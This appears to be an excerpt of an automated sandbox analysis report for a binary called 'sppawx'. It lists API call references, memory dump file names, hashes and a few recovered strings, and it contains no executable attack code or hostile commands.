                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A979
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A99E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335CA4
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F1A
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F2B
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F3C
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                              • Instruction ID: 3b484ac50d4e111ac76a3f2ab287e26252b5ff5c68401f3e8781e938fc4dcac7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1AD22E0E2428AFB30BF36D8511B9B6A1EF44784FC0917EEA4D47A95DF3CE4418760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction ID: 7a3959de93039282e157ae04f5481e05272fd7b9dbb69084736715d6bd93dca3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36315E32A19B8186EB60DF35E8442AEB3A4FB89754F94027EEA8D43B54DF3CC1458B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction ID: b0ff41ac84198448cbcf2568e0ac2fe20c8b03adda14bb607e648aef98ac31ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0B17F22F1E69642FE71AB7294001B9F291AB44BE4FC4517DEE5E07B99EF7CE4418320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F1A
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F2B
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F3C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33564C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction ID: 37bb2e31aadd618a36d41bc34ce82cdb919f596565e8e273e8dc3f1907308c56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15514E22E1E6428AF730FF36D8915A9F760AB48784FC5917DEA4D43A96DF3CE4408760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction ID: f2298fdaefd2b869abe530aa26f401fead0b331a83ba4b977d153f7c8e5205c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5115A22B19F058AFB10DF71E8492B973A4FB19758F840E39EA2D867A4DF3CD1548350
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction ID: 123891bb35a5043a73d4f4bae39de9fcd0dce573fc41bb07452d654f7afccbd9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BC1B072B1E68687EB349F2AA14466AF7A1FB94784FC5813DDB4A43744DE3DE8018B40
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                              • API String ID: 0-1127688429
                                                                                                                                                                                                                              • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                              • Instruction ID: f7982e9a5cfb01f3e96080ce20f953c74056099c203566f57c7cb480f83822fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73F1A262E2A3D58BF7B5EF288088B3ABAE9EF44745F8541BCDA4947390CB38D541C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                              • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                              • Instruction ID: 746b2c225121a0d354e2161c6a41a21042db9040ac88f6ffd5bcf293992360d1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06B19D73A09B88CBEB25CF39C8523687BA0F784B48F948969DA5D877A4CF39D451C710
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                              • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                              • Instruction ID: 7ba648a3b57352b7bbf5ab70c2bd8d9cc64e9e57d51fc2e9226e6aa166344e10
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25E1B336A0A64686FB78AF39805013DB3A0FF45B68F96427DDE4E07694DF39E841C720
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                              • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                              • Instruction ID: 74b8cd71650ef5fa229b68ae02b52aca9bdfefe817b3b0350da7b629d90f4a87
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2291A472A192C68BF7B5DE24C48CB3E7AA9FB44350F91417DDA4A46780DB3CE981CB10
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                              • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                              • Instruction ID: 32264a5cccfb59c00f60e35f8d41169eef2c0c801e1b31ad50dee52f93849266
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E516862F192C586F7349A36D801769FB91E744B98F98C27DCFA847AC5CE3DE4418710
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                              • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                              • Instruction ID: aa6dcd62ea32d6c893a36579479b3f0d05cd4f047e1729bbf039bad0182ea69e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC02AA21E1F64651FAB5BB36A40127DF690AF46BA0FC586BDED5D463D2DE3CA8408320
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction ID: a21b5936b482aa6c6f2763f8e276a42cb8146c20d2e6f71870302f4882ee86d1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AA13362A0A7C686FB31DF39A4107A9BB91EBA0BC4F44807ADE8D47785DE3DE501C710
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                              • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                              • Instruction ID: 094177e68a05096e7993d357303e2917094f729b24121f6b2861882d7b06de05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1518C12F1A64642FA74BB37590117AF291AF85BC4FC846BDDE0E477D6EE3CE4028220
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
